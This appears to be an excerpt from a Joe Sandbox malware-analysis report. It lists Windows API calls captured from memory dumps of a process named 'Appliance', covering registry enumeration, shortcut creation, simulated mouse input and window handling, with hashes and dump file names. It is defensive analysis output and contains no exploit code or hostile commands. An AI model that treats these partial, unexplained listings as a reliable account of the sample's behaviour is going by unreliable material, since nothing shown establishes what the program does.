                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                            • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                            • Instruction ID: f2d5ff9063a187efe007bca34c5550fdd2d1989a1c83fc21359a0d28307e2743
                                                                                                                                            • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                            • Instruction Fuzzy Hash: 6E81C871A0070EABD724AF69CC41B7A77E8EF54324F2AC12AE711D7682E770D94087B4
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00DE8649,00DE8649,?,?,?,00DF67C2,00000001,00000001,8BE85006), ref: 00DF65CB
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DF67C2,00000001,00000001,8BE85006,?,?,?), ref: 00DF6651
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DF674B
                                                                                                                                            • __freea.LIBCMT ref: 00DF6758
                                                                                                                                              • Part of subcall function 00DF3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DE6A79,?,0000015D,?,?,?,?,00DE85B0,000000FF,00000000,?,?), ref: 00DF3BC5
                                                                                                                                            • __freea.LIBCMT ref: 00DF6761
                                                                                                                                            • __freea.LIBCMT ref: 00DF6786
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                            • Opcode ID: fb340feaa4a7a885df64f5fddf51ef890198eb2dc7b8c20d0124604ff01f2f15
                                                                                                                                            • Instruction ID: aad2ea0481d71af3da070297aee2e76f2e97d3e4f94f9a411c09a299938e2e9d
                                                                                                                                            • Opcode Fuzzy Hash: fb340feaa4a7a885df64f5fddf51ef890198eb2dc7b8c20d0124604ff01f2f15
                                                                                                                                            • Instruction Fuzzy Hash: 8151277260020EAFDB249F60CD85EBF77A9EB40754F1A8668FE04D6940EB35DC54C6B0
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                              • Part of subcall function 00E4D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E4C10E,?,?), ref: 00E4D415
                                                                                                                                              • Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D451
                                                                                                                                              • Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4C8
                                                                                                                                              • Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4FE
                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E4C72A
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E4C785
                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E4C7CA
                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E4C7F9
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E4C853
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00E4C85F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1120388591-0
                                                                                                                                            • Opcode ID: 0593d8edbd3ec73b3db55ad1d9a6d008de8406c4ab8bb16b6acd8364166cf812
                                                                                                                                            • Instruction ID: d8b52fe2dd3c572d414b55958c02bf4a6888913f0fed08e99c674edf915a5a5e
                                                                                                                                            • Opcode Fuzzy Hash: 0593d8edbd3ec73b3db55ad1d9a6d008de8406c4ab8bb16b6acd8364166cf812
                                                                                                                                            • Instruction Fuzzy Hash: 75819D30208341AFC754DF24D885E2ABBE5FF84318F14999DF4599B2A2DB31ED45CBA2
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 00E200A9
                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00E20150
                                                                                                                                            • VariantCopy.OLEAUT32(00E20354,00000000), ref: 00E20179
                                                                                                                                            • VariantClear.OLEAUT32(00E20354), ref: 00E2019D
                                                                                                                                            • VariantCopy.OLEAUT32(00E20354,00000000), ref: 00E201A1
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00E201AB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3859894641-0
                                                                                                                                            • Opcode ID: dc3fbec053c13aaaaf900b68121c935cda2dbd3d78f4445c42e570bafc57597c
                                                                                                                                            • Instruction ID: 809766fd142a283b488808d8cc895c4020b2d2335394cd99a5c0f275b85d5ac0
                                                                                                                                            • Opcode Fuzzy Hash: dc3fbec053c13aaaaf900b68121c935cda2dbd3d78f4445c42e570bafc57597c
                                                                                                                                            • Instruction Fuzzy Hash: 7E510D31500324EADF24AB65A889B69B3E5EF45310F24A847F905FF2E7DB709C44CB65
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC41EA: _wcslen.LIBCMT ref: 00DC41EF
                                                                                                                                              • Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A
                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00E39F2A
                                                                                                                                            • _wcslen.LIBCMT ref: 00E39F4B
                                                                                                                                            • _wcslen.LIBCMT ref: 00E39F72
                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00E39FCA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                                                                                            • String ID: X
                                                                                                                                            • API String ID: 83654149-3081909835
                                                                                                                                            • Opcode ID: 823c15d8d25e3c034123b94f698f77d9d4fe55a5968c7ca5918d191d6f89e00b
                                                                                                                                            • Instruction ID: ffa4f9118b96e0a915a7ebbaad3a7caef2098715a620c96cff053fb0b32487e1
                                                                                                                                            • Opcode Fuzzy Hash: 823c15d8d25e3c034123b94f698f77d9d4fe55a5968c7ca5918d191d6f89e00b
                                                                                                                                            • Instruction Fuzzy Hash: D7E18F316043419FC724EF25C885F6ABBE5EF84314F04896DF8899B2A2DB71DD45CBA2
                                                                                                                                            APIs
                                                                                                                                            • _wcslen.LIBCMT ref: 00E36F21
                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00E3707E
                                                                                                                                            • CoCreateInstance.OLE32(00E60CC4,00000000,00000001,00E60B34,?), ref: 00E37095
                                                                                                                                            • CoUninitialize.OLE32 ref: 00E37319
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                            • String ID: .lnk
                                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                                            • Opcode ID: 1d0d4e376c2d15dcca0c76007ba190b811a7146641e5612ef5cbbd603e658601
                                                                                                                                            • Instruction ID: 0bb0d7778e62204f15625578861211f4a0e1ce6ffae8bbd9fcaa344d5ddb5339
                                                                                                                                            • Opcode Fuzzy Hash: 1d0d4e376c2d15dcca0c76007ba190b811a7146641e5612ef5cbbd603e658601
                                                                                                                                            • Instruction Fuzzy Hash: 00D14AB1508301AFC314EF24C881E6BB7E8FF98704F50495DF5969B252DB71E945CBA2
                                                                                                                                            APIs
                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E311B3
                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00E311EE
                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00E3120A
                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00E31283
                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00E3129A
                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E312C8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3368777196-0
                                                                                                                                            • Opcode ID: cc350ffdcc16d058fd75f9477a2cc9a996e02c16ca8f7a95770f33f7efb1e18f
                                                                                                                                            • Instruction ID: feca98123024615f78fc4716aa3508dd4966b13f2fa51c13207db2d92d01610b
                                                                                                                                            • Opcode Fuzzy Hash: cc350ffdcc16d058fd75f9477a2cc9a996e02c16ca8f7a95770f33f7efb1e18f
                                                                                                                                            • Instruction Fuzzy Hash: 4C414C71900205AFDF04AF55DC85AAABBB8FF04314F1444A9E904AE2A6DB70DE55DBB0
                                                                                                                                            APIs
                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00E1FBEF,00000000,?,?,00000000,?,00E039E2,00000004,00000000,00000000), ref: 00E58CA7
                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00E58CCD
                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00E58D2C
                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00E58D40
                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00E58D66
                                                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00E58D8A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                            • Opcode ID: f0b1fd0c9318e90d0fd0412667956b0362e986903a6951943815dbb675c46db3
                                                                                                                                            • Instruction ID: f4081d24957ea2ea897dfbe90a83929dad47755be5e3a014f70d58abee7bb25e
                                                                                                                                            • Opcode Fuzzy Hash: f0b1fd0c9318e90d0fd0412667956b0362e986903a6951943815dbb675c46db3
                                                                                                                                            • Instruction Fuzzy Hash: 8241EA30606244AFDB25DF25CA95FA57BF0FB4530AF1414AAED087B1B2CB31584DCB51
                                                                                                                                            APIs
                                                                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 00E42D45
                                                                                                                                              • Part of subcall function 00E3EF33: GetWindowRect.USER32(?,?), ref: 00E3EF4B
                                                                                                                                            • GetDesktopWindow.USER32 ref: 00E42D6F
                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00E42D76
                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00E42DB2
                                                                                                                                            • GetCursorPos.USER32(?), ref: 00E42DDE
                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E42E3C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2387181109-0
                                                                                                                                            • Opcode ID: 7b0905e885c75e1ae809874cccefd44c591bafcc351eb667d76b5bc469efff8f
                                                                                                                                            • Instruction ID: 1f7390f28907b4dd89a2519297c5ad83d78b32cccee175ac368d3a0f0cc14058
                                                                                                                                            • Opcode Fuzzy Hash: 7b0905e885c75e1ae809874cccefd44c591bafcc351eb667d76b5bc469efff8f
                                                                                                                                            • Instruction Fuzzy Hash: 0231EF72909315AFC724DF149C49F9BB7A9FB84314F00092EF595A7181DB70E909CB92
                                                                                                                                            APIs
                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00E255F9
                                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E25616
                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E2564E
                                                                                                                                            • _wcslen.LIBCMT ref: 00E2566C
                                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E25674
                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00E2567E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 72514467-0
                                                                                                                                            • Opcode ID: 17ec706dfc711943d0a44c7f023f501ab387880eedaad7f99569bb40a3b9b437
                                                                                                                                            • Instruction ID: 4c88325f42fbe6b1957cc0208e8ac6a88e5c299815d01a24553344e50464b476
                                                                                                                                            • Opcode Fuzzy Hash: 17ec706dfc711943d0a44c7f023f501ab387880eedaad7f99569bb40a3b9b437
                                                                                                                                            • Instruction Fuzzy Hash: 9B21F672204650BFEB266B36ED49E7B7BA8EF45750F14403AF805EA091EBB1DC419670
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC55D1,?,?,00E04B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DC5871
                                                                                                                                            • _wcslen.LIBCMT ref: 00E362C0
                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00E363DA
                                                                                                                                            • CoCreateInstance.OLE32(00E60CC4,00000000,00000001,00E60B34,?), ref: 00E363F3
                                                                                                                                            • CoUninitialize.OLE32 ref: 00E36411
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                            • String ID: .lnk
                                                                                                                                            • API String ID: 3172280962-24824748
                                                                                                                                            • Opcode ID: bcd86634a5e6801bdf964710daec4831731c96d36b097ad355b0939e4b37c41e
                                                                                                                                            • Instruction ID: 335dc280632582f1dcd0d04746fa5ffbaabeb028c731e4429b6553140b234340
                                                                                                                                            • Opcode Fuzzy Hash: bcd86634a5e6801bdf964710daec4831731c96d36b097ad355b0939e4b37c41e
                                                                                                                                            • Instruction Fuzzy Hash: 93D12571A04301AFC714DF25C484A2ABBE5FF89714F14995DF889AB361CB32EC45CBA2
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,00DE36E9,00DE3355), ref: 00DE3700
                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DE370E
                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DE3727
                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00DE36E9,00DE3355), ref: 00DE3779
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                            • Opcode ID: 5e4a63a9f485c1e36994d01caf7aedde57fda815123f9d58f2b86cea94c59c8c
                                                                                                                                            • Instruction ID: eb95429dd5055aa797c0a9c20a4ad366752843e8fbcbe9f018d4bc1470a6d240
                                                                                                                                            • Opcode Fuzzy Hash: 5e4a63a9f485c1e36994d01caf7aedde57fda815123f9d58f2b86cea94c59c8c
                                                                                                                                            • Instruction Fuzzy Hash: C701F5B254D3912EE62936B7AC8E97A3795EB04772B300229F114530F0EF518D065270
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00DE4D53,00000000,?,?,00DE68E2,?,?,00000000), ref: 00DF30EB
                                                                                                                                            • _free.LIBCMT ref: 00DF311E
                                                                                                                                            • _free.LIBCMT ref: 00DF3146
                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00DF3153
                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00DF315F
                                                                                                                                            • _abort.LIBCMT ref: 00DF3165
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                            • Opcode ID: 02265fd6c8c20ef79fbf33be38d69c64e30d4d93786fdeba56213ad989830f8f
                                                                                                                                            • Instruction ID: 3811b7c79b151928ee779923d5146cd452ced09e2a83f6d5a577207cc349b8b7
                                                                                                                                            • Opcode Fuzzy Hash: 02265fd6c8c20ef79fbf33be38d69c64e30d4d93786fdeba56213ad989830f8f
                                                                                                                                            • Instruction Fuzzy Hash: 2CF0A9755087086AC6262736AC0AA7F1659DFC1771B27C514FB18E22D1EF218E464171
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DC1F87
                                                                                                                                              • Part of subcall function 00DC1F2D: SelectObject.GDI32(?,00000000), ref: 00DC1F96
                                                                                                                                              • Part of subcall function 00DC1F2D: BeginPath.GDI32(?), ref: 00DC1FAD
                                                                                                                                              • Part of subcall function 00DC1F2D: SelectObject.GDI32(?,00000000), ref: 00DC1FD6
                                                                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00E594AA
                                                                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 00E594BE
                                                                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00E594CC
                                                                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 00E594DC
                                                                                                                                            • EndPath.GDI32(?), ref: 00E594EC
                                                                                                                                            • StrokePath.GDI32(?), ref: 00E594FC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
